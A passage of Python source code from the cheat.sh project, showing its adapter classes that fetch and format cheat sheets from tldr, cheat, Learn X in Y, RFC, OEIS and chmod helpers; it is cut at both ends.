find_nearest_color(hex_color): R, G, B = rgb_from_str(hex_color) mindiff = None for d in VALID_COLORS: r, g, b = rgb_from_str(d) diff = abs(R -r)*256 + abs(G-g)* 256 + abs(B- b)* 256 if mindiff is None or diff < mindiff: mindiff = diff mincolorname = d return mincolorname File: lib/adapter/latenz.py """ Adapter for the curlable latencies numbers (chubin/late.nz) This module can be an example of a adapter for a python project. The adapter exposes one page ("latencies") and several its aliases ("latencies", "late.nz", "latency") """ # pylint: disable=relative-import import sys import os from .git_adapter import GitRepositoryAdapter class Latenz(GitRepositoryAdapter): """ chubin/late.nz Adapter """ _adapter_name = "late.nz" _output_format = "ansi" _repository_url = "https://github.com/chubin/late.nz" def _get_page(self, topic, request_options=None): sys.path.append(os.path.join(self.local_repository_location(), 'bin')) import latencies return latencies.render() def _get_list(self, prefix=None): return ['latencies'] def is_found(self, topic): return topic.lower() in ['latencies', 'late.nz', 'latency'] File: lib/adapter/tldr.py """ Adapter for https://github.com/cheat/cheat Cheatsheets are located in `pages/*/` Each cheat sheet is a separate file with extension .md The pages are formatted with a markdown dialect """ # pylint: disable=relative-import,abstract-method import re import os from .git_adapter import GitRepositoryAdapter class Tldr(GitRepositoryAdapter): """ tldr-pages/tldr adapter """ _adapter_name = "tldr" _output_format = "code" _cache_needed = True _repository_url = "https://github.com/tldr-pages/tldr" _cheatsheet_files_prefix = "pages/*/" _cheatsheet_files_extension = ".md" @staticmethod def _format_page(text): """ Trivial tldr Markdown implementation. * Header goes until the first empty line after > prefixed lines. * code surrounded with `` => code * {{var}} => var """ answer = [] skip_empty = False header = 2 for line in text.splitlines(): if line.strip() == '': if skip_empty and not header: continue if header == 1: header = 0 if header: continue else: skip_empty = False if line.startswith('-'): line = '# '+line[2:] skip_empty = True elif line.startswith('> '): if header == 2: header = 1 line = '# '+line[2:] skip_empty = True elif line.startswith('`') and line.endswith('`'): line = line[1:-1] line = re.sub(r'{{(.*?)}}', r'\1', line) answer.append(line) return "\n".join(answer) def _get_page(self, topic, request_options=None): """ Go through pages/{common,linux,osx,sunos,windows}/ and as soon as anything is found, format and return it. """ search_order = ['common', 'linux', 'osx', 'sunos', 'windows', "android"] local_rep = self.local_repository_location() ext = self._cheatsheet_files_extension filename = None for subdir in search_order: _filename = os.path.join( local_rep, 'pages', subdir, "%s%s" % (topic, ext)) if os.path.exists(_filename): filename = _filename break if filename: answer = self._format_page(open(filename, 'r').read()) else: # though it should not happen answer = '' return answer @classmethod def get_updates_list(cls, updated_files_list): """ If a .md file was updated, invalidate cache entry with the name of this file """ answer = [] ext = cls._cheatsheet_files_extension for entry in updated_files_list: if entry.endswith(ext): answer.append(entry.split('/')[-1][:-len(ext)]) return answer File: lib/adapter/internal.py """ Configuration parameters: frontend.styles path.internal.pages """ import sys import os import collections try: from rapidfuzz import process, fuzz _USING_FUZZYWUZZY=False except ImportError: from fuzzywuzzy import process, fuzz _USING_FUZZYWUZZY=True from config import CONFIG from .adapter import Adapter from fmt.internal import colorize_internal _INTERNAL_TOPICS = [ ":cht.sh", ":bash_completion", ":emacs", ":emacs-ivy", ":firstpage", ":firstpage-v1", ":firstpage-v2", ":fish", ":help", ":intro", ":list", ":post", ":styles", ":styles-demo", ":vim", ":zsh", ] _COLORIZED_INTERNAL_TOPICS = [ ':intro', ] class InternalPages(Adapter): _adapter_name = 'internal' _output_format = 'ansi' def __init__(self, get_topic_type=None, get_topics_list=None): Adapter.__init__(self) self.get_topic_type = get_topic_type self.get_topics_list = get_topics_list def _get_stat(self): stat = collections.Counter([ self.get_topic_type(topic) for topic in self.get_topics_list() ]) answer = "" for key, val in stat.items(): answer += "%s %s\n" % (key, val) return answer @staticmethod def get_list(prefix=None): return _INTERNAL_TOPICS def _get_list_answer(self, topic, request_options=None): if '/' in topic: topic_type, topic_name = topic.split('/', 1) if topic_name == ":list": topic_list = [x[len(topic_type)+1:] for x in self.get_topics_list() if x.startswith(topic_type + "/")] return "\n".join(topic_list)+"\n" answer = "" if topic == ":list": answer = "\n".join(x for x in self.get_topics_list()) + "\n" return answer def _get_page(self, topic, request_options=None): if topic.endswith('/:list') or topic.lstrip('/') == ':list': return self._get_list_answer(topic) answer = "" if topic == ':styles': answer = "\n".join(CONFIG["frontend.styles"]) + "\n" elif topic == ":stat": answer = self._get_stat()+"\n" elif topic in _INTERNAL_TOPICS: answer = open(os.path.join(CONFIG["path.internal.pages"], topic[1:]+".txt"), "r").read() if topic in _COLORIZED_INTERNAL_TOPICS: answer = colorize_internal(answer) return answer def is_found(self, topic): return ( topic in self.get_list() or topic.endswith('/:list') ) class UnknownPages(InternalPages): _adapter_name = 'unknown' _output_format = 'text' @staticmethod def get_list(prefix=None): return [] @staticmethod def is_found(topic): return True def _get_page(self, topic, request_options=None): topics_list = self.get_topics_list() if topic.startswith(':'): topics_list = [x for x in topics_list if x.startswith(':')] else: topics_list = [x for x in topics_list if not x.startswith(':')] if _USING_FUZZYWUZZY: possible_topics = process.extract(topic, topics_list, scorer=fuzz.ratio)[:3] else: possible_topics = process.extract(topic, topics_list, limit=3, scorer=fuzz.ratio) possible_topics_text = "\n".join([(" * %s %s" % (x[0], int(x[1]))) for x in possible_topics]) return """ Unknown topic. Do you mean one of these topics maybe? %s """ % possible_topics_text class Search(Adapter): _adapter_name = 'search' _output_format = 'text' _cache_needed = False @staticmethod def get_list(prefix=None): return [] def is_found(self, topic): return False File: lib/adapter/cmd.py """ """ # pylint: disable=unused-argument,abstract-method import os.path import re from subprocess import Popen, PIPE from .adapter import Adapter def _get_abspath(path): """Find absolute path of the specified `path` according to its """ if path.startswith("/"): return path import __main__ return os.path.join( os.path.dirname(os.path.dirname(__main__.__file__)), path) class CommandAdapter(Adapter): """ """ _command = [] def _get_command(self, topic, request_options=None): return self._command def _get_page(self, topic, request_options=None): cmd = self._get_command(topic, request_options=request_options) if cmd: try: proc = Popen(cmd, stdout=PIPE, stderr=PIPE) answer = proc.communicate()[0].decode('utf-8', 'ignore') except OSError: return "ERROR of the \"%s\" adapter: please create an issue" % self._adapter_name return answer return "" class Fosdem(CommandAdapter): """ Show the output of the `current-fosdem-slide` command, which shows the current slide open in some terminal. This was used during the talk at FOSDEM 2019. https://www.youtube.com/watch?v=PmiK0JCdh5A `sudo` is used here because the session was running under a different user; to be able to use the command via sudo, the following `/etc/suders` entry was added: srv ALL=(ALL:ALL) NOPASSWD: /usr/local/bin/current-fosdem-slide Here `srv` is the user under which the cheat.sh server was running """ _adapter_name = "fosdem" _output_format = "ansi" _pages_list = [":fosdem"] _command = ["sudo", "/usr/local/bin/current-fosdem-slide"] class Translation(CommandAdapter): """ """ _adapter_name = "translation" _output_format = "text" _cache_needed = True def _get_page(self, topic, request_options=None): from_, topic = topic.split('/', 1) to_ = request_options.get('lang', 'en') if '-' in from_: from_, to_ = from_.split('-', 1) return ["/home/igor/cheat.sh/bin/get_translation", from_, to_, topic.replace('+', ' ')] class AdapterRfc(CommandAdapter): """ Show RFC by its number. Exported as: "/rfc/NUMBER" """ _adapter_name = "rfc" _output_format = "text" _cache_needed = True _command = ["share/adapters/rfc.sh"] def _get_command(self, topic, request_options=None): cmd = self._command[:] if not cmd[0].startswith("/"): cmd[0] = _get_abspath(cmd[0]) # cut rfc/ off if topic.startswith("rfc/"): topic = topic[4:] return cmd + [topic] def _get_list(self, prefix=None): return list("rfc/%s" % x for x in range(1, 8649)) def is_found(self, topic): return True class AdapterOeis(CommandAdapter): """ Show OEIS by its number. Exported as: "/oeis/NUMBER" """ _adapter_name = "oeis" _output_format = "text+code" _cache_needed = True _command = ["share/adapters/oeis.sh"] @staticmethod def _get_filetype(topic): if "/" in topic: language = topic.split("/")[-1].lower() return language return "bash" def _get_command(self, topic, request_options=None): cmd = self._command[:] if not cmd[0].startswith("/"): cmd[0] = _get_abspath(cmd[0]) # cut oeis/ off # Replace all non (alphanumeric, '-', ':') chars with Spaces to delimit args to oeis.sh if topic.startswith("oeis/"): topic = topic[5:] suffix = "" if topic.endswith("/:list"): suffix = " :list" topic = topic[:-6] topic = re.sub('[^a-zA-Z0-9-:]+', ' ', topic) + suffix return cmd + [topic] def is_found(self, topic): return True class AdapterChmod(CommandAdapter): """ Show chmod numeric values and strings Exported as: "/chmod/NUMBER" """ _adapter_name = "chmod" _output_format = "text" _cache_needed = True _command = ["share/adapters/chmod.sh"] def _get_command(self, topic, request_options=None): cmd = self._command[:] # cut chmod/ off # remove all non (alphanumeric, '-') chars if topic.startswith("chmod/"): topic = topic[6:] topic = re.sub('[^a-zA-Z0-9-]', '', topic) return cmd + [topic] def is_found(self, topic): return True File: lib/adapter/adapter.py """ `Adapter`, base class of the adapters. Configuration parameters: path.repositories """ import abc import os from six import with_metaclass from config import CONFIG class AdapterMC(type): """ Adapter Metaclass. Defines string representation of adapters """ def __repr__(cls): if hasattr(cls, '_class_repr'): return getattr(cls, '_class_repr')() return super(AdapterMC, cls).__repr__() class Adapter(with_metaclass(AdapterMC, object)): """ An abstract class, defines methods: (cheat sheets retrieval) * get_list * is_found * is_cache_needed (repositories management) " fetch * update and several properties that have to be set in each adapter subclass. """ _adapter_name = None _output_format = 'code' _cache_needed = False _repository_url = None _local_repository_location = None _cheatsheet_files_prefix = "" _cheatsheet_files_extension = "" _pages_list = [] @classmethod def _class_repr(cls): return '[Adapter: %s (%s)]' % (cls._adapter_name, cls.__name__) def __init__(self): self._list = {None: self._get_list()} @classmethod def name(cls): """ Return name of the adapter """ return cls._adapter_name @abc.abstractmethod def _get_list(self, prefix=None): return self._pages_list def get_list(self, prefix=None): """ Return available pages for `prefix` """ if prefix in self._list: return self._list[prefix] self._list[prefix] = set(self._get_list(prefix=prefix)) return self._list[prefix] def is_found(self, topic): """ check if `topic` is available CAUTION: only root is checked """ return topic in self._list[None] def is_cache_needed(self): """ Return True if answers should be cached. Return False if answers should not be cached. """ return self._cache_needed @staticmethod def _format_page(text): """ Preformatting page hook. Converts `text` (as in the initial repository) to text (as to be displayed). """ return text @abc.abstractmethod def _get_page(self, topic, request_options=None): """ Return page for `topic` """ pass def _get_output_format(self, topic): if '/' in topic: subquery = topic.split('/')[-1] else: subquery = topic if subquery in [':list']: return 'text' return self._output_format # pylint: disable=unused-argument @staticmethod def _get_filetype(topic): """ Return language name (filetype) for `topic` """ return None def get_page_dict(self, topic, request_options=None): """ Return page dict for `topic` """ # # if _get_page() returns a dict, use the dictionary # for the answer. It is possible to specify some # useful properties as the part of the answer # (e.g. "cache") # answer by _get_page() always overrides all default properties # answer = self._get_page(topic, request_options=request_options) if not isinstance(answer, dict): answer = {"answer": answer} answer_dict = { 'topic': topic, 'topic_type': self._adapter_name, 'format': self._get_output_format(topic), 'cache': self._cache_needed, } answer_dict.update(answer) # pylint: disable=assignment-from-none filetype = self._get_filetype(topic) if filetype: answer_dict["filetype"] = filetype return answer_dict @classmethod def local_repository_location(cls, cheat_sheets_location=False): """ Return local repository location. If name `self._repository_url` for the class is not specified, return None It is possible that several adapters has the same repository_url, in this case they should use the same local directory. If for some reason the local repository location should be overridden (e.g. if several different branches of the same repository are used) if should set in `self._local_repository_location` of the adapter. If `cheat_sheets_location` is specified, return path of the cheat sheets directory instead of the repository directory. """ dirname = None if cls._local_repository_location: dirname = cls._local_repository_location if not dirname and cls._repository_url: dirname = cls._repository_url if dirname.startswith('https://'): dirname = dirname[8:] elif dirname.startswith('http://'): dirname = dirname[7:] # if we did not manage to find out dirname up to this point, # that means that neither repository url, not repository location # is specified for the adapter, so it should be skipped if not dirname: return None if dirname.startswith('/'): return dirname # it is possible that several repositories will # be mapped to the same location name # (because only the last part of the path is used) # in this case provide the name in _local_repository_location # (detected by fetch.py) if '/' in dirname: dirname = dirname.split('/')[-1] path = os.path.join(CONFIG['path.repositories'], dirname) if cheat_sheets_location: path = os.path.join(path, cls._cheatsheet_files_prefix) return path @classmethod def repository_url(cls): """ Return URL of the upstream repository """ return cls._repository_url @classmethod def fetch_command(cls): """ Initial fetch of the repository. Return cmdline that has to be executed to fetch the repository. Skipping if `self._repository_url` is not specified """ if not cls._repository_url: return None # in this case `fetch` has to be implemented # in the distinct adapter subclass raise RuntimeError( "Do not known how to handle this repository: %s" % cls._repository_url) @classmethod def update_command(cls): """ Update of the repository. Return cmdline that has to be executed to update the repository inside `local_repository_location()`. """ if not cls._repository_url: return None local_repository_dir = cls.local_repository_location() if not local_repository_dir: return None # in this case `update` has to be implemented # in the distinct adapter subclass raise RuntimeError( "Do not known how to handle this repository: %s" % cls._repository_url) @classmethod def current_state_command(cls): """ Get current state of repository (current revision). This is used to find what cache entries should be invalidated. """ if not cls._repository_url: return None local_repository_dir = cls.local_repository_location() if not local_repository_dir: return None # in this case `update` has to be implemented # in the distinct adapter subclass raise RuntimeError( "Do not known how to handle this repository: %s" % cls._repository_url) @classmethod def save_state(cls, state): """ Save state `state` of the repository. Must be called after the cache clean up. """ local_repository_dir = cls.local_repository_location() state_filename = os.path.join(local_repository_dir, '.cached_revision') open(state_filename, 'w').write(state) @classmethod def get_state(cls): """ Return the saved `state` of the repository. If state cannot be read, return None """ local_repository_dir = cls.local_repository_location() state_filename = os.path.join(local_repository_dir, '.cached_revision') state = None if os.path.exists(state_filename): state = open(state_filename, 'r').read() return state @classmethod def get_updates_list_command(cls): """ Return the command to get the list of updates since the last update whose id is saved as the repository state (`cached_state`). The list is used to invalidate the cache. """ return None @classmethod def get_updates_list(cls, updated_files_list): """ Return the pages that have to be invalidated if the files `updates_files_list` were updated in the repository. """ if not cls._cheatsheet_files_prefix: return updated_files_list answer = [] cut_len = len(cls._cheatsheet_files_prefix) for entry in updated_files_list: if entry.startswith(cls._cheatsheet_files_prefix): answer.append(entry[cut_len:]) else: answer.append(entry) return answer def all_adapters(as_dict=False): """ Return list of all known adapters If `as_dict` is True, return dict {'name': adapter} instead of a list. """ def _all_subclasses(cls): return set(cls.__subclasses__()).union(set( [s for c in cls.__subclasses__() for s in _all_subclasses(c)] )) if as_dict: return {x.name():x for x in _all_subclasses(Adapter)} return list(_all_subclasses(Adapter)) def adapter_by_name(name): """ Return adapter having this name, or None if nothing found """ return all_adapters(as_dict=True).get(name) File: lib/adapter/cheat_cheat.py """ Adapter for https://github.com/cheat/cheat Cheatsheets are located in `cheat/cheatsheets/` Each cheat sheet is a separate file without extension """ # pylint: disable=relative-import,abstract-method from .git_adapter import GitRepositoryAdapter class Cheat(GitRepositoryAdapter): """ cheat/cheat adapter """ _adapter_name = "cheat" _output_format = "code" _cache_needed = True _repository_url = "https://github.com/cheat/cheatsheets" _cheatsheet_files_prefix = "" _cheatsheet_file_mask = "*" File: lib/adapter/question.py """ Configuration parameters: path.internal.bin.upstream """ # pylint: disable=relative-import from __future__ import print_function import os import re from subprocess import Popen, PIPE from polyglot.detect import Detector from polyglot.detect.base import UnknownLanguage from config import CONFIG from languages_data import SO_NAME from .upstream import UpstreamAdapter NOT_FOUND_MESSAGE = """404 NOT FOUND Unknown cheat sheet. Please try to reformulate your query. Query format: /LANG/QUESTION Examples: /python/read+json /golang/run+external+program /js/regex+search See /:help for more info. If the problem persists, file a GitHub issue at github.com/chubin/cheat.sh or ping @igor_chubin """ class Question(UpstreamAdapter): """ Answer to a programming language question, using Stackoverflow as the main data source. Heavy lifting is done by an external program `CONFIG["path.internal.bin.upstream"]`. If the program is not found, fallback to the superclass `UpstreamAdapter`, which queries the upstream server (by default https://cheat.sh/) for the answer """ _adapter_name = "question" _output_format = "text+code" _cache_needed = True def _get_page(self, topic, request_options=None): """ Find answer for the `topic` question. """ if not os.path.exists(CONFIG["path.internal.bin.upstream"]): # if the upstream program is not found, use normal upstream adapter self._output_format = "ansi" return UpstreamAdapter._get_page(self, topic, request_options=request_options) topic = topic.replace('+', ' ') # if there is a language name in the section name, # cut it off (de:python => python) if '/' in topic: section_name, topic = topic.split('/', 1) if ':' in section_name: _, section_name = section_name.split(':', 1) section_name = SO_NAME.get(section_name, section_name) topic = "%s/%s" % (section_name, topic) # some clients send queries with - instead of + so we have to rewrite them to topic = re.sub(r"(?<!-)-", ' ', topic) topic_words = topic.split() topic = " ".join(topic_words) lang = 'en' try: query_text = topic # " ".join(topic) query_text = re.sub('^[^/]*/+', '', query_text.rstrip('/')) query_text = re.sub('/[0-9]+$', '', query_text) query_text = re.sub('/[0-9]+$', '', query_text) detector = Detector(query_text) supposed_lang = detector.languages[0].code if len(topic_words) > 2 \ or supposed_lang in ['az', 'ru', 'uk', 'de', 'fr', 'es', 'it', 'nl']: lang = supposed_lang if supposed_lang.startswith('zh_') or supposed_lang == 'zh': lang = 'zh' elif supposed_lang.startswith('pt_'): lang = 'pt' if supposed_lang in ['ja', 'ko']: lang = supposed_lang except UnknownLanguage: print("Unknown language (%s)" % query_text) if lang != 'en': topic = ['--human-language', lang, topic] else: topic = [topic] cmd = [CONFIG["path.internal.bin.upstream"]] + topic proc = Popen(cmd, stdin=open(os.devnull, "r"), stdout=PIPE, stderr=PIPE) answer = proc.communicate()[0].decode('utf-8') if not answer: return NOT_FOUND_MESSAGE return answer def get_list(self, prefix=None): return [] def is_found(self, topic): return True File: lib/adapter/__init__.py """ Import all adapters from the current directory and make them available for import as adapter_module.AdapterName """ # pylint: disable=wildcard-import,relative-import from os.path import dirname, basename, isfile, join import glob __all__ = [ basename(f)[:-3] for f in glob.glob(join(dirname(__file__), "*.py")) if isfile(f) and not f.endswith('__init__.py')] from .adapter import all_adapters from . import * File: lib/adapter/cheat_sheets.py """ Implementation of the adapter for the native cheat.sh cheat sheets repository, cheat.sheets. The cheat sheets repository is hierarchically structured: cheat sheets covering programming languages are are located in subdirectories. """ # pylint: disable=relative-import import os import glob from .git_adapter import GitRepositoryAdapter def _remove_initial_underscore(filename): if filename.startswith('_'): filename = filename[1:] return filename def _sanitize_dirnames(filename, restore=False): """ Remove (or add) leading _ in the directories names in `filename` The `restore` param means that the path name should be restored from the queryname, i.e. conversion should be done in the opposite direction """ parts = filename.split('/') newparts = [] for part in parts[:-1]: if restore: newparts.append('_'+part) continue if part.startswith('_'): newparts.append(part[1:]) else: newparts.append(part) newparts.append(parts[-1]) return "/".join(newparts) class CheatSheets(GitRepositoryAdapter): """ Adapter for the cheat.sheets cheat sheets. """ _adapter_name = "cheat.sheets" _output_format = "code" _repository_url = "https://github.com/chubin/cheat.sheets" _cheatsheet_files_prefix = "sheets/" def _get_list(self, prefix=None): """ Return all files on the first and the second level, excluding directories and hidden files """ hidden_files = ["_info.yaml"] answer = [] prefix = os.path.join( self.local_repository_location(), self._cheatsheet_files_prefix) for mask in ['*', '*/*']: template = os.path.join( prefix, mask) answer += [ _sanitize_dirnames(f_name[len(prefix):]) for f_name in glob.glob(template) if not os.path.isdir(f_name) and os.path.basename(f_name) not in hidden_files] return sorted(answer) def _get_page(self, topic, request_options=None): filename = os.path.join( self.local_repository_location(), self._cheatsheet_files_prefix, _sanitize_dirnames(topic, restore=True)) if os.path.exists(filename): answer = self._format_page(open(filename, 'r').read()) else: # though it should not happen answer = "%s:%s not found" % (str(self.__class__), topic) return answer class CheatSheetsDir(CheatSheets): """ Adapter for the cheat sheets directories. Provides pages named according to subdirectories: _dir => dir/ (currently only _get_list() is used; _get_page is shadowed by the CheatSheets adapter) """ _adapter_name = "cheat.sheets dir" _output_format = "text" def _get_list(self, prefix=None): template = os.path.join( self.local_repository_location(), self._cheatsheet_files_prefix, '*') answer = sorted([ _remove_initial_underscore(os.path.basename(f_name)) + "/" for f_name in glob.glob(template) if os.path.isdir(f_name)]) return answer def _get_page(self, topic, request_options=None): """ Content of the `topic` dir is the list of the pages in the dir """ template = os.path.join( self.local_repository_location(), self._cheatsheet_files_prefix, topic.rstrip('/'), '*') answer = sorted([ os.path.basename(f_name) for f_name in glob.glob(template)]) return "\n".join(answer) + "\n" def is_found(self, topic): return CheatSheets.is_found(self, topic.rstrip('/')) File: lib/adapter/learnxiny.py """ Adapters for the cheat sheets from the Learn X in Y project Configuration parameters: log.level """ # pylint: disable=relative-import from __future__ import print_function import os import re from config import CONFIG from .git_adapter import GitRepositoryAdapter class LearnXinY(GitRepositoryAdapter): """ Adapter for the LearnXinY project """ _adapter_name = 'learnxiny' _output_format = 'code' _cache_needed = True _repository_url = "https://github.com/adambard/learnxinyminutes-docs" def __init__(self): self.adapters = _ADAPTERS GitRepositoryAdapter.__init__(self) def _get_page(self, topic, request_options=None): """ Return cheat sheet for `topic` or empty string if nothing found """ lang, topic = topic.split('/', 1) if lang not in self.adapters: return '' return self.adapters[lang].get_page(topic) def _get_list(self, prefix=None): """ Return list of all learnxiny topics """ answer = [] for language_adapter in self.adapters.values(): answer += language_adapter.get_list(prefix=True) return answer def is_found(self, topic): """ Return whether `topic` is a valid learnxiny topic """ if '/' not in topic: return False lang, topic = topic.split('/', 1) if lang not in self.adapters: return False return self.adapters[lang].is_valid(topic) class LearnXYAdapter(object): """ Parent class of all languages adapters """ _learn_xy_path = LearnXinY.local_repository_location() _replace_with = {} _filename = '' prefix = '' _replace_with = {} _splitted = True _block_cut_start = 2 _block_cut_end = 0 def __init__(self): self._whole_cheatsheet = self._read_cheatsheet() self._blocks = self._extract_blocks() self._topics_list = [x for x, _ in self._blocks] if "Comments" in self._topics_list: self._topics_list = [x for x in self._topics_list if x != "Comments"] + ["Comments"] self._topics_list += [":learn", ":list"] if self._whole_cheatsheet and CONFIG.get("log.level") >= 5: print(self.prefix, self._topics_list) def _is_block_separator(self, before, now, after): if (re.match(r'////////*', before) and re.match(r'// ', now) and re.match(r'////////*', after)): block_name = re.sub(r'//\s*', '', now).replace('(', '').replace(')', '') block_name = '_'.join(block_name.strip(", ").split()) for character in '/,': block_name = block_name.replace(character, '') for k in self._replace_with: if k in block_name: block_name = self._replace_with[k] return block_name return None def _cut_block(self, block, start_block=False): if not start_block: answer = block[self._block_cut_start:-self._block_cut_end] if answer == []: return answer if answer[0].strip() == '': answer = answer[1:] if answer[-1].strip() == '': answer = answer[:1] return answer def _read_cheatsheet(self): filename = os.path.join(self._learn_xy_path, self._filename) # if cheat sheets are not there (e.g. were not yet fetched), # just skip it if not os.path.exists(filename): return None with open(filename) as f_cheat_sheet: code_mode = False answer = [] for line in f_cheat_sheet.readlines(): if line.startswith('```'): if not code_mode: code_mode = True continue else: code_mode = False if code_mode: answer.append(line.rstrip('\n')) return answer def _extract_blocks(self): if not self._splitted: return [] lines = self._whole_cheatsheet if lines is None: return [] answer = [] block = [] block_name = "Comments" for before, now, after in zip([""]+lines, lines, lines[1:]): new_block_name = self._is_block_separator(before, now, after) if new_block_name: if block_name: block_text = self._cut_block(block) if block_text != []: answer.append((block_name, block_text)) block_name = new_block_name block = [] continue else: block.append(before) answer.append((block_name, self._cut_block(block))) return answer def is_valid(self, name): """ Check whether topic `name` is valid. """ for topic_list in self._topics_list: if topic_list == name: return True return False def get_list(self, prefix=None): """ Get list of topics for `prefix` """ if prefix: return ["%s/%s" % (self.prefix, x) for x in self._topics_list] return self._topics_list def get_page(self, name, partial=False): """ Return specified cheat sheet `name` for the language. If `partial`, cheat sheet name may be shortened """ if name == ":list": return "\n".join(self.get_list()) + "\n" if name == ":learn": if self._whole_cheatsheet: return "\n".join(self._whole_cheatsheet) + "\n" else: return "" if partial: possible_names = [] for block_name, _ in self._blocks: if block_name.startswith(name): possible_names.append(block_name) if possible_names == [] or len(possible_names) > 1: return None name = possible_names[0] for block_name, block_contents in self._blocks: if block_name == name: return "\n".join(block_contents) return None # # Specific programming languages LearnXY cheat sheets configurations # Contains much code for the moment; should contain data only # ideally should be replaced with YAML # class LearnAwkAdapter(LearnXYAdapter): "Learn AWK in Y Minutes" prefix = "awk" _filename = "awk.html.markdown" _splitted = False class LearnBashAdapter(LearnXYAdapter): "Learn Bash in Y Minutes" prefix = "bash" _filename = "bash.html.markdown" _splitted = False class LearnBfAdapter(LearnXYAdapter): "Learn Brainfuck in Y Minutes" prefix = "bf" _filename = "bf.html.markdown" _splitted = False class LearnCAdapter(LearnXYAdapter): "Learn C in Y Minutes" prefix = "c" _filename = "c.html.markdown" _splitted = False class LearnChapelAdapter(LearnXYAdapter): "Learn Chapel in Y Minutes" prefix = "chapel" _filename = "chapel.html.markdown" _splitted = False class LearnClojureAdapter(LearnXYAdapter): """ Learn Clojure in Y Minutes """ prefix = "clojure" _filename = "clojure.html.markdown" def _is_block_separator(self, before, now, after): if (re.match(r'\s*$', before) and re.match(r';\s*', now) and re.match(r';;;;;;+', after)): block_name = re.sub(r';\s*', '', now) block_name = '_'.join([x.strip(",&:") for x in block_name.strip(", ").split()]) return block_name return None @staticmethod def _cut_block(block, start_block=False): if not start_block: answer = block[2:] if answer[0].split() == '': answer = answer[1:] if answer[-1].split() == '': answer = answer[:1] return answer class LearnCoffeeScriptAdapter(LearnXYAdapter): "Learn coffeescript in Y Minutes" prefix = "coffee" _filename = "coffeescript.html.markdown" _splitted = False class LearnCppAdapter(LearnXYAdapter): """ Learn C++ in Y Minutes """ prefix = "cpp" _filename = "c++.html.markdown" _replace_with = { 'More_about_Objects': 'Prototypes', } def _is_block_separator(self, before, now, after): if (re.match(r'////////*', before) and re.match(r'// ', now) and re.match(r'////////*', after)): block_name = re.sub(r'//\s*', '', now).replace('(', '').replace(')', '') block_name = '_'.join(block_name.strip(", ").split()) for character in '/,': block_name = block_name.replace(character, '') for k in self._replace_with: if k in block_name: block_name = self._replace_with[k] return block_name return None @staticmethod def _cut_block(block, start_block=False): answer = block[2:-1] if answer == []: return answer if answer[0].split() == '': answer = answer[1:] if answer[-1].split() == '': answer = answer[:1] return answer class LearnCsharpAdapter(LearnXYAdapter): "Learn C# in Y Minutes" prefix = "csharp" _filename = "csharp.html.markdown" _splitted = False class LearnDAdapter(LearnXYAdapter): "Learn D in Y Minutes" prefix = "d" _filename = "d.html.markdown" _splitted = False class LearnDartAdapter(LearnXYAdapter): "Learn Dart in Y Minutes" prefix = "dart" _filename = "dart.html.markdown" _splitted = False class LearnFactorAdapter(LearnXYAdapter): "Learn Factor in Y Minutes" prefix = "factor" _filename = "factor.html.markdown" _splitted = False class LearnForthAdapter(LearnXYAdapter): "Learn Forth in Y Minutes" prefix = "forth" _filename = "forth.html.markdown" _splitted = False class LearnFsharpAdapter(LearnXYAdapter): "Learn F# in Y Minutes" prefix = "fsharp" _filename = "fsharp.html.markdown" _splitted = False class LearnElispAdapter(LearnXYAdapter): "Learn Elisp in Y Minutes" prefix = "elisp" _filename = "elisp.html.markdown" _splitted = False class LearnElixirAdapter(LearnXYAdapter): """ Learn Elixir in Y Minutes """ prefix = "elixir" _filename = "elixir.html.markdown" _replace_with = { 'More_about_Objects': 'Prototypes', } def _is_block_separator(self, before, now, after): if (re.match(r'## ---*', before) and re.match(r'## --', now) and re.match(r'## ---*', after)): block_name = re.sub(r'## --\s*', '', now) block_name = '_'.join(block_name.strip(", ").split()) for character in '/,': block_name = block_name.replace(character, '') for k in self._replace_with: if k in block_name: block_name = self._replace_with[k] return block_name return None @staticmethod def _cut_block(block, start_block=False): answer = block[2:-1] if answer[0].split() == '': answer = answer[1:] if answer[-1].split() == '': answer = answer[:1] return answer class LearnElmAdapter(LearnXYAdapter): """ Learn Elm in Y Minutes """ prefix = "elm" _filename = "elm.html.markdown" _replace_with = { 'More_about_Objects': 'Prototypes', } def _is_block_separator(self, before, now, after): if (re.match(r'\s*', before) and re.match(r'\{--.*--\}', now) and re.match(r'\s*', after)): block_name = re.sub(r'\{--+\s*', '', now) block_name = re.sub(r'--\}', '', block_name) block_name = '_'.join(block_name.strip(", ").split()) for character in '/,': block_name = block_name.replace(character, '') for k in self._replace_with: if k in block_name: block_name = self._replace_with[k] return block_name return None @staticmethod def _cut_block(block, start_block=False): answer = block[2:-1] if answer[0].split() == '': answer = answer[1:] if answer[-1].split() == '': answer = answer[:1] return answer class LearnErlangAdapter(LearnXYAdapter): """ Learn Erlang in Y Minutes """ prefix = "erlang" _filename = "erlang.html.markdown" def _is_block_separator(self, before, now, after): if (re.match('%%%%%%+', before) and re.match(r'%%\s+[0-9]+\.', now) and re.match('%%%%%%+', after)): block_name = re.sub(r'%%+\s+[0-9]+\.\s*', '', now) block_name = '_'.join(block_name.strip('.').strip().split()) return block_name return None @staticmethod def _cut_block(block, start_block=False): answer = block[2:-1] if answer[0].split() == '': answer = answer[1:] if answer[-1].split() == '': answer = answer[:1] return answer class LearnFortranAdapter(LearnXYAdapter): "Learn Fortran in Y Minutes" prefix = "fortran" _filename = "fortran95.html.markdown" _splitted = False class LearnGoAdapter(LearnXYAdapter): "Learn Go in Y Minutes" prefix = "go" _filename = "go.html.markdown" _splitted = False class LearnGroovyAdapter(LearnXYAdapter): "Learn Groovy in Y Minutes" prefix = "groovy" _filename = "groovy.html.markdown" _splitted = False class LearnJavaAdapter(LearnXYAdapter): "Learn Java in Y Minutes" prefix = "java" _filename = "java.html.markdown" _splitted = False class LearnJavaScriptAdapter(LearnXYAdapter): """ Learn JavaScript in Y Minutes """ prefix = "js" _filename = "javascript.html.markdown" _replace_with = { 'More_about_Objects': 'Prototypes', } def _is_block_separator(self, before, now, after): if (re.match('//////+', before) and re.match(r'//+\s+[0-9]+\.', now) and re.match(r'\s*', after)): block_name = re.sub(r'//+\s+[0-9]+\.\s*', '', now) block_name = '_'.join(block_name.strip(", ").split()) for k in self._replace_with: if k in block_name: block_name = self._replace_with[k] return block_name return None @staticmethod def _cut_block(block, start_block=False): answer = block[2:-1] if answer[0].split() == '': answer = answer[1:] if answer[-1].split() == '': answer = answer[:1] return answer class LearnJuliaAdapter(LearnXYAdapter): """ Learn Julia in Y Minutes """ prefix = "julia" _filename = "julia.html.markdown" def _is_block_separator(self, before, now, after): if (re.match('####+', before) and re.match(r'##\s*', now) and re.match('####+', after)): block_name = re.sub(r'##\s+[0-9]+\.\s*', '', now) block_name = 